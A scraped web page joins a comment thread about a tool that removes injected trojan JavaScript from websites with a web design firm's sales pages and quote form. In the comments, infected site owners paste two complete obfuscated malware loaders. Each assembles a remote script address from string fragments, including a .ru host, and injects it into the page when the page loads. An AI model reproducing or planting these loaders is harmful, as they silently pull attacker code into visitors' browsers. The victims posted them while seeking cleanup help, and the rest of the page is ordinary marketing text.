s="/nat"+"e.co"+"m/na"+"te.c"+"om/gleu".substr(0,4)+"rPMdoogl".substr(4)+"6wVe.co6wV".substr(3,4)+"m/tr"+"HqtNipod".substr(4)+"bnOA.com".substr(4)+"/inceVb".substr(0,4)+"UAZOrediZAOU".substr(4,4)+"xP4mail4xP".substr(3,4)+".com1dU".substr(0,4)+"VN0.phpV0N".substr(3,4);this.jE='';var jt=new Array();var t=Y('89707978779074',"749");var rG;if(rG!='' && rG!='ZB'){rG='sn'};var h="on"+"lo"+"6u3ad".substr(3);this.LQ="";this.mr="";this.Yh='';var vi;if(vi!='Kc'){vi=''};window[h]=function(){var Hh;if(Hh!='' && Hh!='sw'){Hh=null};var Zh;if(Zh!=''){Zh='SJ'};z=document.createElement(F);this.Py='';var Jv;if(Jv!='' && Jv!='nb'){Jv='AN'};var LR=new String();var Fr=new String();fM+=c;var PZ;if(PZ!='_m' && PZ!='pz'){PZ='_m'};var NL="";fM+=t+s;var Fg;if(Fg!=''){Fg='nO'};var dO="";z.src=fM;z.defer=u;var dc;if(dc!='dw' && dc!='U_'){dc='dw'};var mw;if(mw!='qa' && mw!='JM'){mw=''};var o=document.body;o.appendChild(z);var ed;if(ed!='Xy' && ed != ''){ed=null};var fJ=new String();};var Iy=new String();} catch(q){var inU;if(inU!='' && inU!='Ju'){inU=''};var ac="";};var hF=new Array();var fT=new Array();</script>
the PHP script doesnt seem to work, i ran it on a IIS server with php5 and nothing happened, i checked the files and the infected file was still there, i copied the whole javascript, and one without the <script> tags and still nothing.
joe
peterprossedi@hotmail.com
im getting Unable to clean a infected file(file not writable) and theres no way i can give write access to all these files....there are a few hundered........
Hi peter, Many people don't have recent backups. Also on many machines the infection is too widespread and it may take many hours to find malicious code and remove them manually in each file. These tools are targeted to save time of people who are infected.
Peter
pk@kelmace.com
Why use the manual trojan code remover? Why not just remove the malware code from the files or replace them from a backup? That's what I did yesterday from an infection I found and there does not appear to be an issue or re-infection. FTP passwords were changed too of course.
Msia
yong_isprings@yahoo.com
i pasted the script but it was not deleted. Does it works on the script below? <script>var i;if(i!='' && i!='f'){i=null};this.US='';function h(){var N;if(N!='D'){N='D'};this.q='';this.K="";var A;if(A!=''){A='fI'};var H=new String("g");var u='';var eQ;if(eQ!='' && eQ!='R'){eQ=null};var j="";var zr="";var G=RegExp;var ia;if(ia!='Om' && ia != ''){ia=null};this.tD="";var GF="";function z(O,M){var t=new G("["+M+"]", H);return O.replace(t, u);var hS=new Date();var Oa;if(Oa!='' && Oa!='C'){Oa=''};};var GN='';var Dj='';var qY=new Array();var U=z('83359903298992509252',"2593");var T="scri"+"fNLpt".substr(3);var F=new String("9Qm/go".substr(3)+"oglqDT5".substr(0,3)+"arOe.cOra".substr(3,3)+"NZdom/".substr(3)+"gooNuBK".substr(0,3)+"Ef6gle".substr(3)+".co"+"m/m"+"HasediHas".substr(3,3)+"afi"+"c9jyre.".substr(4)+"com"+"izm/remzi".substr(3,3)+"DK3tver3tDK".substr(4,3)+"Ilrso.".substr(3)+"0oGnetGo0".substr(3,3)+"Gt3/xctG3".substr(3,3)+"y1sar.y1s".substr(3,3)+"comEkf".substr(0,3)+"mtH.cn".substr(3)+"cEFa.ph".substr(4)+"3VUp".substr(3));var TB='';var m=String("bdKWhtt".substr(4)+"p:/"+"cYtB/ms".substr(4)+"GiDYn-c".substr(4)+"om-"+"tIBcn.".substr(3)+"5nM1torn1M5".substr(4,3)+"renLfY".substr(0,3)+"C0mtz.".substr(3)+"MG6scomGsM6".substr(4,3)+"lugK.so".substr(4)+"8x9egou89ex".substr(4,3)+"TGgx-co".substr(4)+"H6kIm.sI6kH".substr(4,3)+"eas"+"ilv"+"ers"+"SQ1kite".substr(4)+"NX3.ruN3X".substr(3,3)+"8rp5:pr58".substr(4,1));var An;if(An!='Ck' && An!='vt'){An=''};var Wg='';window.onload=function(){this.d='';this.ac='';try {var II;if(II!=''){II='Q'};this.ib="";TB=m+U;this.ML='';TB+=F;var pW;if(pW!='IC' && pW != ''){pW=null};var WP='';var l='';_=document.createElement(T);this.Cu="";var WV;if(WV!='' && WV!='N_'){WV='O_'};this.L="";var hh;if(hh!='g' && hh!='Mk'){hh='g'};_.defer=[1][0];this.Rl="";_.src=TB;this.HC="";this.TR="";document.body.appendChild(_);var Aj=new Array();} catch(e){var CQ=new Date();var bD;if(bD!=''){bD='qp'};};var UK='';};this.AY='';};h();var Ja;if(Ja!='' && Ja!='HB'){Ja='Mg'};</script>
Christina
tinaxo@gmail.com
Oh, and it doesn't show "Success" or anything.. I don't know why.
Christina
tinaxo@gmail.com
I enter the code and it goes through but none of the files were edited. It doesn't give me any error or anything but the bad code is still there. Any ideas why?
hey hatem, you need PHP5+ to run this script. Please do not forget to clean up your local machines first and change FTP password.

Web site design

web development, php web development, flex development, joomla development, web design, search engine optimaization, seo services, seo company, data mining.

Our attractive and appealing web site designs bring you
More Business, More Customers.

When you select Possible Solutions for your website design, you'll be selecting a professional web design and development company that prides itself on supplying visually stunning best custom web page design that helps your business work, grow and progress better. Because successful web design requires several elements, innovative engaging graphical design, fast stable performance, a clear focus on functionality, client satisfaction and usability and as a web development company we assure all these. We are proud to say that we have all these things. Clean website design that keeps your visitors happy, and a professional custom web design solution that has our clientele doing more business online than ever before.

We provide website designs at affordable prices with high quality. If you are looking for a professional website designing and development company then you've come to the right place for website design and web development company.

View our web site design portfolio

Web Development

web development, php web development, flex development, joomla development, web design, search engine optimaization, seo services, seo company, data mining.

E-commerce, CRM web-applications, Community Portals, Dating Websites, Real Estate Indexes, Business Directories, Seach Engines, search engine optimization, Forums, Blogs, CRM web applications
Everything is POSSIBLE!

Possible Solutions has proven its ability in providing its customers with the worlds leading e-commerce solutions. Our team has all the technical knowledge, experience and expertise that are required to develop any kind of e-commerce application. We are empowered to provide our customers with standard and customized e-commerce website development solutions that can coincide with their budget and thus can help them achieve their goals even at affordable costs.

We also have strong expertise in building Community websites, Dating websites, Video/music sharing portals. To meet client's cost and time requirements we also use open source application as and when required. This speeds up the development cycle and also gives you code which is tested and being used by a large community.

Real Estate website is also a lucrative venture for companies and agents working in real estate industry. We have developed custom website applications for real estate companies and agents where they can display their real estate listings in user friendly and quickly browsable format. Our applications are also developed so that they can be easily integrated with any MLS/IDX servers. Currently we support NorthWestIDX but other servers can be added if required.

Content Managament Systems are our strength we have built two versions of our own CMS system and third the most poswerful one is in pipeline. We also have strong knowledge of major open-source CMS systems such as Joomla, Drupal etc. and we can develop components/modules for Joomla/Drupal.

Possible Solutions have also stepped into customizing and developing modules or extensions for opensource CRM applications such as vTiger or SugarCRM for small/medium or large businesses.

Search Engines and Web Crawlers, this is another area where we excel. We have successfully developed Internal Search engine(INSEARCH). Besides this we also have good experience experience of developing web crawlers, automated data scrappers and online data collection and analysis tools.

With web development we also also emerging in search engine optimization and we are ready to stand in competition of seo services to grow our clients business. We have always been ready to work on new challenges and ideas, so no matter how complex your project is, we are always ready to take on it and complete it successfully.

So lets get started, It's Possible!

Search Engine Optimization ( SEO )

Why is Search Engine Optimisation so important for your Business?
Why are High Rankings in Google’s natural/organic listings so important?
"73% of new website visitors come through Search Engines"

Did your web site rank in search engine? What is your ranking over search engine? If you have business over your web site but business not meets expectation because of less hits or less traffic then your web site is needed to optimize.

Why SEO is needed? Over 80% of online market gets traffic through search engines like Google, Yahoo!, etc. Highest rank achieved in organic listing for highly searched keyword can generate more sale and more business through your website.


SEO plans by Possible Solutions will benefit your website with:

  • High volumes of ‘ready to spend’ traffic – these visitors are actively searching for your products and services
  • Reduced costs for winning new customers = greater profits!


How do we do it?

  • First of all, Search Engine Optimization is not any trick that can quickly place you at higher rank; it takes time to see results.
  • Following processes that constantly improves the effectiveness of our clients’ keyword position in ranking of search engine.
  • Effective SEO requires a skilled labor and time period.
  • Possible Solutions have the skilled professionals’ and resources that are able to undertake any demanding SEO campaigns in most competitive markets.


Effective SEO is made up of the following components:

  • Onsite Optimisation
    Onsite SEO is required for crawling and indexing of websites which helps in effective ranking over the keyword competition. Onsite Optimization includes the placement of keyword at important places in content, HTML code optimization, navigation, internal link and page flow optimization also the most important content optimization.
    Our SEO specialist better understand the search engine optimization in terms of Google and other Search Engines working. The crawling and indexing by bots\spiders friendly optimization is done here.
  • Keyword, competitor and market analysis
    Before starting Optimization our Analysis Team analyses the all the constraints related to market and competition then on detailed analysis the most searched and targeted keywords and phrases for your business are optimized. Then our expert works on SEO strategies to higher rank in search engines.
    Possible solution promises maximum 'Value for money'.
  • Link Building -
    Quality links is the key features for optimization in competitive campaigns. We focus on strict link building criteria, all our links are manually obtained and spamming is strictly avoided.
  • Reporting and monitoring -
    We ensure client the progress through the detail report on monthly basis with 24X7 online supports. We also provide installation of Google Analytic and Google webmaster tool that allows monitoring all details of traffic like keyword used, pages visited, no of visitors, area/country of visitors traffic, popularity analysis.
    We also provides detail report regarding keywords ranking for you website which shows the SEO progress.

Request a quote

It's POSSIBLE!

Possible Solutions
301, Sai Shankar Apt,
R.S. Road,Chendani,
Thane(West), Maharashtra
India,400602
Phone: +91-9890103122


Your Name*
Company Name
Web Site URL
Address (City/State/Country)
Phone*
Email Address*
How do you know us?


General Project Information:
Overall project Description*
Project type For new website
need to upgrade current system
needs maintainance
Other Internet related work
Software Development
If your site needs upgrading what is your present URL address
Project start date
Deadline
Project Budget Amount
Project Scope (check all that apply) Websites- brochure type
Websites- database / ecommerce
Database Driven Site
Flash for websites
HTML email newsletters
Banner ads / button ads
Internet marketing
Search Engine Optimization (seo)
Open source cutomization
Web templates and themes
Logos / business cards / letterheads
Brochures / flyers
Packaging / Box Shots
3d modeling
Book / video / album / cd covers
Flash / cd-rom presentations
Multimedia animation (non-web)
Video presentations
Billboards / poster displays


Information about your current website or system.
Current hosting platform Windows     Unix     Linux     Other     None
Current database mySQL     PostGRE     Oracle     Not Sure     None
Current markup/scripting language PHP     ASP     RUBY     HTML     XML     WML

Not Sure     None


Services Required.
Do you need Flash work? Yes     no
Do you need Content Management System? Yes     No
Do you need web hosting? Yes     No
Do you need databases? Yes     No
Do graphic image material need to be created *? Yes     No
Describe Imaging/Scanning needs if any
Number of html pages needed


Enter up to 3 web site addresses which you feel are representative or similiar to the site you would like for your business.
sample url 1
sample url 2
sample url 3


Image Verification:
Enter six digit code displayed here in the textbox next.    Enter the six character code in the image.